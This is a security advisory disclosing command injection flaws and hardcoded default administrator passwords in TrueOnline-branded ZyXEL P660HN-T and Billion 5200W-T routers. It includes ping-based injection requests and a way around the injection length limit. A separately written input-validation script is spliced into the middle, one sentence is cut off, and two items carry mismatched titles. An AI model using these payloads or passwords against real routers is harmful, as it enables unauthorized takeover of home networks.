TrueOnline ZyXEL / Billion Command Injection / Default Credentials

17 Jan 2017, reported by Pedro Ribeiro. Type: packetstorm. Source: packetstormsecurity.com

TrueOnline / ZyXEL / Billion Command Injection and Default Credentials Vulnerabilities

===============  
>> Multiple vulnerabilities in TrueOnline / ZyXEL / Billion routers  
>> Discovered by Pedro Ribeiro ([email protected]), Agile Information  
Security  
==========================================================================  
Disclosure: 26/12/2016 / Last updated: 12/01/2017  
  
  
>> Summary:  
TrueOnline is a major Internet Service Provider in Thailand which  
distributes various rebranded ZyXEL and Billion routers to its customers.  
Three router models - ZyXEL P660HN-T v1, ZyXEL P660HN-T v2 and Billion  
5200W-T - contain a number of default administrative accounts, as well  
as authenticated and unauthenticated command injection vulnerabilities  
in their web interfaces, mostly in the syslog remote forwarding  
function. All the routers are still in widespread use in Thailand, with  
the Billion 5200W-T router currently being distributed to new customers.  
  
These routers are based on the TC3162U SoC (or variants of it), a  
system-on-a-chip made by TrendChip, an SoC manufacturer that was  
acquired by Ralink / MediaTek in 2011.  
TC3162U based routers have two firmware variants.  
  
The first variant is "ras", used on hardware versions that have 4 MB or  
less of flash storage, and is based on the real-time operating system  
ZynOS. It is infamous because it includes Allegro RomPager v4.07, which is  
vulnerable to the "misfortune cookie" attack (see [1]), and its web  
server is vulnerable to the "rom-0" attack (see [2]).  
The other variant is "tclinux", a full-fledged Linux used in  
hardware versions that have more than 4 MB of flash storage. This  
advisory refers to this variant, which includes the GoAhead web server  
and several ASP files with the command injection vulnerabilities. Note  
that tclinux might also be vulnerable to the misfortune cookie and rom-0  
attacks - this was not investigated in detail by the author. For more  
information on tclinux see [3].  
  
It should be noted that tclinux contains files and configuration  
settings in other languages (for example in Turkish). Therefore it is  
likely that these firmware versions are not specific to TrueOnline, and  
other ISP customised routers in other countries might also be  
vulnerable. It is also possible that other brands and router models that  
use the tclinux variant are also affected by the command injection  
vulnerabilities (the default accounts are likely to be TrueOnline  
specific). Please contact [email protected] if you find any other routers  
or firmware versions that have the same vulnerabilities.  
  
These vulnerabilities were discovered in July 2016 and reported through  
Securiteam's Secure Disclosure program (see  
https://blogs.securiteam.com/index.php/archives/2910 for their  
advisory). SSD contacted the vendors involved, but received no reply and  
posted their advisory on December 26th 2016. There is currently no fix  
for these issues. It is unknown whether these issues are exploitable  
over the WAN, although this is a possibility since some of the default  
accounts appear to have been deployed for ISP use.  
  
Three Metasploit modules that abuse these vulnerabilities have been  
released (see [4], [5] and [6]).  
  
  
>> Technical details:  
#1  
Vulnerability: Unauthenticated command injection (ZyXEL P660HN-T v1)  
NO-CVE  
Attack Vector: Remote  
Constraints: Can be exploited by an unauthenticated attacker in the LAN.  
See below for other constraints.  
Affected versions:  
- ZyXEL P660HN-T, hardware revision v1, TrueOnline firmware version  
TCLinux Fw $7.3.15.0 v001 / 3.40(ULM.0)b31, other firmware versions  
might be affected  
  
This router has a command injection vulnerability in the Maintenance >  
Logs > System Log > Remote System Log forwarding function.  
The vulnerability is in the ViewLog.asp page, which is accessible  
unauthenticated. The following request will cause the router to issue 3  
ping requests to 10.0.99.102:  
  
POST /cgi-bin/ViewLog.asp HTTP/1.1  
remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bping+-c+3+10.0.99.102%3b%23&remoteSubmit=Save  
  
The command injection is in the remote_host parameter.  
This vulnerability was found during a black box assessment of the web  
interface, so a root cause was not determined.  
  
  
#2  
Vulnerability: Authenticated command injection (ZyXEL P660HN-T v2)  
NO-CVE  
Attack Vector: Remote  
Constraints: Can be exploited by an authenticated attacker in the LAN.  
See below for other constraints.  
Affected versions:  
- ZyXEL P660HN-T, hardware revision v2, TrueOnline firmware version  
TCLinux Fw #7.3.37.6, other firmware versions might be affected  
  
Unlike in the P660HN-T v1, the injection is authenticated and in the  
logSet.asp page. However, this router contains a hardcoded supervisor  
password (see below) that can be used to exploit this vulnerability.  
The injection is in the logSet.asp page that sets up remote forwarding  
of syslog logs, and the parameter vulnerable to injection is the  
serverIP parameter, which can be abused in the following way:  
  
ServerIP=1.1.1.1`<COMMAND>`&#  
  
The following request will cause the router to issue 3 ping requests to  
1.1.1.1:  
  
POST /cgi-bin/pages/maintenance/logSetting/logSet.asp HTTP/1.1  
logSetting_H=1&active=1&logMode=LocalAndRemote&serverIP=192.168.1.1`ping  
-c 3 1.1.1.1`%26%23&serverPort=514  
  
This vulnerability was found during a black box assessment of the web  
interface, so a root cause was not determined. It is known that this  
injection ends up in /etc/syslog.conf as  
  
The actual injection is limited to 28 characters. This can be circumvented  
by writing a shell script file in the /tmp directory 28 characters at a  
time, and then executing that file.  
  
  
#3  
Vulnerability: Unauthenticated command injection (Billion 5200W-T)  
NO-CVE  
Attack Vector: Remote  
Constraints: Can be exploited by an unauthenticated attacker in the LAN.  
See below for other constraints.  
Affected versions:  
- Billion 5200W-T, TrueOnline firmware version 1.02b.rc5.dt49, other  
firmware versions might be affected  
  
The Billion 5200W-T router contains an unauthenticated command injection  
in adv_remotelog.asp page, which is used to set up remote syslog forwarding.  
The following request will cause the router to issue 3 ping requests to  
192.168.1.35:  
  
POST /cgi-bin/adv_remotelog.asp HTTP/1.1  
Host: 192.168.1.1  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 85  
  
RemotelogEnable=1&syslogServerAddr=1.1.1.1%3bping+-c+3+192.168.1.35%3b&serverPort=514  
  
The injection is in the syslogServerAddr parameter and can be exploited  
by entering a valid IP address, followed by ";<COMMAND>;".  
This vulnerability was found during a black box assessment of the web  
interface, so a root cause was not determined.  
  
  
#4  
Vulnerability: Authenticated command injection (Billion 5200W-T)  
NO-CVE  
Attack Vector: Remote  
Constraints: Can be exploited by an authenticated attacker in the LAN.  
See below for other constraints.  
Affected versions:  
- Billion 5200W-T, TrueOnline firmware version TCLinux Fw $7.3.8.0 v008  
130603, other firmware versions might be affected  
  
The Billion 5200W-T router also has several other command injections in  
its interface, depending on the firmware version, such as an  
authenticated command injection in tools_time.asp (uiViewSNTPServer  
parameter).  
It should be noted that this router contains several hardcoded  
administrative accounts that can be used to exploit this vulnerability.  
This injection can be exploited with the following request:  
  
POST /cgi-bin/tools_time.asp HTTP/1.1  
Host: 192.168.1.1  
Authorization: Basic YWRtaW46cGFzc3dvcmQ=  
Cookie: SESSIONID=7c082c75  
  
SaveTime=1&uiCurrentTime2=&uiCurrentTime1=&ToolsTimeSetFlag=0&uiRadioValue=0&uiClearPCSyncFlag=0&uiwPCdateMonth=0&uiwPCdateDay=&uiwPCdateYear=&uiwPCdateHour=&uiwPCdateMinute=&uiwPCdateSec=&uiCurTime=N%2FA+%28NTP+server+is+connecting%29&uiTimezoneType=0&uiViewSyncWith=0&uiPCdateMonth=1&uiPCdateDay=&uiPCdateYear=&uiPCdateHour=&uiPCdateMinute=&uiPCdateSec=&uiViewdateToolsTZ=GMT%2B07%3A00&uiViewdateDS=Disable&uiViewSNTPServer="%3b+ping+-c+20+192.168.0.1+%26%23&ntp2ServerFlag=N%2FA&ntp3ServerFlag=N%2FA  
  
This writes the command to a file /etc/ntp.sh:  
/userfs/bin/ntpclient -s -c 3 -l -h ""; ping -c 20 192.168.0.1 &#" &  
which is then executed almost immediately.  
  
This vulnerability was found during a black box assessment of the web  
interface, so a root cause was not determined.  
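The four injections above share one root: a host name or IP address taken from a web form (remote_host, serverIP, syslogServerAddr, uiViewSNTPServer) reaches a shell command or a config file without being checked. The following allow-list validator is an added example written for this advisory, not code from the advisory or from the router firmware; the parameter names are the ones quoted above, and the accepted grammar (an IPv4 literal or an RFC 1123 hostname) is my assumption of what such a field should accept before it is written to /etc/syslog.conf or /etc/ntp.sh. The sample bodies are the advisory's own requests, embedded here as test input.

```python
"""Allow-list validation for router form fields that end up in a shell.

Added example for this advisory; the parameter names come from the
requests quoted above, the grammar is an assumption (IPv4 or hostname).
"""
import ipaddress
import re
from urllib.parse import parse_qs

# Parameters the advisory identifies as command injection points.
SHELL_BOUND_PARAMS = {"remote_host", "serverIP", "syslogServerAddr", "uiViewSNTPServer"}

# RFC 1123 hostname: dot-separated labels of letters, digits and hyphens,
# no label starting or ending with a hyphen, no label over 63 characters.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
HOSTNAME_RE = re.compile(rf"^(?:{_LABEL}\.)*{_LABEL}$")


def is_safe_host(value: str) -> bool:
    """True only for an IPv4 literal or a plain hostname; anything that
    carries shell metacharacters (; ` & # space) fails both branches."""
    if not value or len(value) > 253:
        return False
    try:
        ipaddress.IPv4Address(value)  # raises ValueError on anything non-IPv4
        return True
    except ValueError:
        pass
    return HOSTNAME_RE.fullmatch(value) is not None


def check_form_body(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body and return
    {param: decoded_value} for every shell-bound parameter that fails the
    allow-list. An empty dict means the request is safe to pass on."""
    params = parse_qs(body, keep_blank_values=True)
    rejected = {}
    for name in SHELL_BOUND_PARAMS.intersection(params):
        for value in params[name]:
            if not is_safe_host(value):
                rejected[name] = value
    return rejected


# Constructed test input: the bodies of the advisory's sample requests.
P660HN_V1_BODY = ("remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1"
                  "&LogFlag=0&remote_host=%3bping+-c+3+10.0.99.102%3b%23&remoteSubmit=Save")
BILLION_BODY = "RemotelogEnable=1&syslogServerAddr=1.1.1.1%3bping+-c+3+192.168.1.35%3b&serverPort=514"
BENIGN_BODY = "RemotelogEnable=1&syslogServerAddr=192.168.1.35&serverPort=514"
```

Running check_form_body over a proxy or access log of POSTs to the ASP pages named above flags the same values a fixed firmware should have refused.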
  
  
#5  
Vulnerability: Default administrative credentials (ZyXEL P660HN-T v1)  
NO-CVE  
Attack Vector: Remote  
Constraints: N/A  
Affected versions:  
- ZyXEL P660HN-T, hardware revision v1, TrueOnline firmware version  
TCLinux Fw $7.3.15.0 v001 / 3.40(ULM.0)b31, other firmware versions  
might be affected  
  
This router contains the following default administrative accounts:  
username: admin; password: password  
username: true; password: true  
  
  
#6  
Vulnerability: Authenticated command injection (ZyXEL P660HN-T v2)  
NO-CVE  
Attack Vector: Remote  
Constraints: N/A  
Affected versions:  
- ZyXEL P660HN-T, hardware revision v2, TrueOnline firmware version  
TCLinux Fw #7.3.37.6, other firmware versions might be affected  
  
This router contains the following default administrative accounts:  
username: admin; password: password  
username: true; password: true  
username: supervisor; password: zyad1234  
  
  
#7  
Vulnerability: Authenticated command injection (Billion 5200W-T)  
NO-CVE  
Attack Vector: Remote  
Constraints: N/A  
Affected versions:  
- Billion 5200W-T, TrueOnline firmware version TCLinux Fw $7.3.8.0 v008  
130603, other firmware versions might be affected  
  
This router contains the following default administrative accounts:  
username: admin; password: password  
username: true; password: true  
username: user3; password:  
12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678  
  
  
>> Fix:  
There is NO FIX for this vulnerability. Do not allow untrusted clients  
to connect to these routers.  
  
Timeline of disclosure:  
July 2016: Vulnerability reported to Securiteam Secure Disclosure.  
Securiteam contacted the affected vendors. No response.  
  
26.12.2016: Vulnerability information published in the SSD blog.  
12.01.2017: Vulnerability information published in  
https://github.com/pedrib/PoC  
  
  
>> References:  
[1] http://www.kb.cert.org/vuls/id/561444  
[2] https://k0st.wordpress.com/2015/07/05/identifying-and-exploiting-rom-0-vulnerabilities/  
[3] https://vasvir.wordpress.com/tag/trendchip-firmware/  
[4] https://github.com/rapid7/metasploit-framework/pull/7820  
[5] https://github.com/rapid7/metasploit-framework/pull/7821  
[6] https://github.com/rapid7/metasploit-framework/pull/7822  
  
  
================  
Agile Information Security Limited  
http://www.agileinfosec.co.uk/  
>> Enabling secure digital business >>  
